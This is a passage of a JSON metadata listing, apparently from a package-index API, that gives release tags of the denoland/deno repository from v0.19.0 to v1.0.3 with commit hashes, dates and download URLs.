odeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0